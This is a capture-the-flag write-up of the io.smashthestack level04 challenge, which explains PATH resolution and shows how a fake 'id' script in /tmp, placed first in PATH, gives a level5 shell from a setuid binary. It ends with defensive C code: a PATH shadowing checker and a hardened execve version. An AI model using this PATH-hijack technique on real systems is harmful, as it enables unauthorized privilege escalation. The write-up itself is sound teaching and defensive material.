Let’s take a look at level04.c:

    #include <stdlib.h>

    int main() {
        system("id");   /* "id" is a bare name, so the shell resolves it through PATH */
        return 0;
    }
We don’t have much to work with here. Looking up the manual entry for system:

    SYSTEM(3)                  Linux Programmer's Manual                  SYSTEM(3)

    NAME
           system - execute a shell command

    SYNOPSIS
           #include <stdlib.h>

           int system(const char *command);

    DESCRIPTION
           system() executes a command specified in command by calling /bin/sh -c
           command, and returns after the command has been completed.  During
           execution of the command, SIGCHLD will be blocked, and SIGINT and
           SIGQUIT will be ignored.
It looks like system("id"); will call /bin/sh -c id. How does /bin/sh know where to look for the program id? There’s an environment variable called PATH, a colon-separated list of directories, and /bin/sh will look for id in each of those directories in order.
    level4@io:/levels$ echo $PATH
    /usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
As you can see, there are several paths in the environment variable. /bin/sh will first look in /usr/local/bin for a program named id, followed by /usr/bin, then /bin and so on; the first match wins. Let’s see if we can add our own paths to it.
    level4@io:~$ PATH=/levels/
    level4@io:~$ echo $PATH
    /levels/
    level4@io:~$ ls
    -bash: ls: command not found
    level4@io:~$
We have just overwritten the PATH environment variable, and now even the command ls cannot be found. Okay, now that you know how paths work, let’s try to get level04 to run our id program.
    level4@io:/levels$ mkdir /tmp/level4
    level4@io:/levels$ echo 'echo Win! && sh' > /tmp/level4/id
    level4@io:/levels$ chmod +x /tmp/level4/id
    level4@io:/levels$ PATH=/tmp/level4:$PATH
    level4@io:/levels$ ./level04
    Win!
    sh-4.2$ whoami
    level5
    sh-4.2$
Here’s what we did:

1. Created a new directory in /tmp.
2. Wrote echo Win! && sh into a file named id in that new directory.
3. Made id executable.
4. Changed PATH to check our new directory first for the program id.
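To make the lesson concrete from the defender’s side, here is an added C example (it is not part of the original write-up or of the io.smashthestack level). It implements the same first-match PATH walk that /bin/sh performs, uses a constructed temporary directory holding a fake id to show that a directory placed first in PATH shadows the real binary, and then shows how level04 could have been written so that the caller’s PATH is never consulted: an absolute path, no shell, and a fixed environment passed to execve. The absolute path /usr/bin/id and the sanitized "PATH=/usr/bin:/bin" are assumptions for a typical Linux layout.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/wait.h>

/* Walk a colon-separated PATH value in order and return the first directory
 * that holds an executable named cmd (the first-match rule sh uses).
 * An empty entry ("::" or a leading/trailing ':') means the current directory. */
int resolve_in_path(const char *cmd, const char *path, char *out, size_t outlen)
{
    const char *p = path;
    for (;;) {
        const char *sep = strchr(p, ':');
        size_t dirlen = sep ? (size_t)(sep - p) : strlen(p);
        int n = dirlen == 0
              ? snprintf(out, outlen, "./%s", cmd)
              : snprintf(out, outlen, "%.*s/%s", (int)dirlen, p, cmd);
        if (n > 0 && (size_t)n < outlen && access(out, X_OK) == 0)
            return 1;                       /* first executable match wins */
        if (!sep)
            break;
        p = sep + 1;
    }
    out[0] = '\0';
    return 0;
}

/* 1 if, under this PATH, the bare name "id" resolves to a file inside
 * attacker_dir, i.e. the shadowing from the write-up would take effect. */
int id_is_shadowed(const char *path, const char *attacker_dir)
{
    char resolved[4096];
    if (!resolve_in_path("id", path, resolved, sizeof resolved))
        return 0;
    size_t n = strlen(attacker_dir);
    return strncmp(resolved, attacker_dir, n) == 0 && resolved[n] == '/';
}

/* Constructed scenario: a temp dir with a fake "id", checked once with that
 * dir first in PATH and once with a sanitized PATH. Returns 1 when the fake
 * id is picked only in the first case, -1 on setup failure. */
int demo_path_shadowing(void)
{
    char dir[] = "/tmp/pathdemoXXXXXX";
    if (!mkdtemp(dir))
        return -1;
    char fake[256];
    snprintf(fake, sizeof fake, "%s/id", dir);
    const char script[] = "#!/bin/sh\necho fake-id\n";
    int fd = open(fake, O_WRONLY | O_CREAT, 0755);
    if (fd < 0)
        return -1;
    if (write(fd, script, strlen(script)) < 0) { close(fd); return -1; }
    close(fd);

    char hijacked[512];
    snprintf(hijacked, sizeof hijacked, "%s:/usr/bin:/bin", dir);
    int shadowed = id_is_shadowed(hijacked, dir);      /* expected: 1 */
    int clean = id_is_shadowed("/usr/bin:/bin", dir);  /* expected: 0 */

    unlink(fake);
    rmdir(dir);
    return shadowed == 1 && clean == 0;
}

/* Hardened replacement for level04's system("id"): absolute path, no shell,
 * and a fixed minimal environment, so the caller's PATH plays no part.
 * Returns the child's exit status (127 if /usr/bin/id is missing), -1 on error. */
int run_id_hardened(void)
{
    char *const argv[] = { "/usr/bin/id", NULL };       /* assumed location */
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL }; /* assumed safe PATH */
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(argv[0], argv, envp);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    printf("fake id shadows real id only when its dir is first in PATH: %d\n",
           demo_path_shadowing());
    printf("hardened id exit status: %d\n", run_id_hardened());
    return 0;
}
```

The lookup function is the check to reach for when auditing a setuid program: feed it the PATH an untrusted caller controls and see where each bare command name lands. The hardened variant is the fix: once the binary is invoked by absolute path with an environment the program itself chose, the directory ordering tricks above have nothing to act on.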
Published on 28 Mar 2013 by Stanley Tan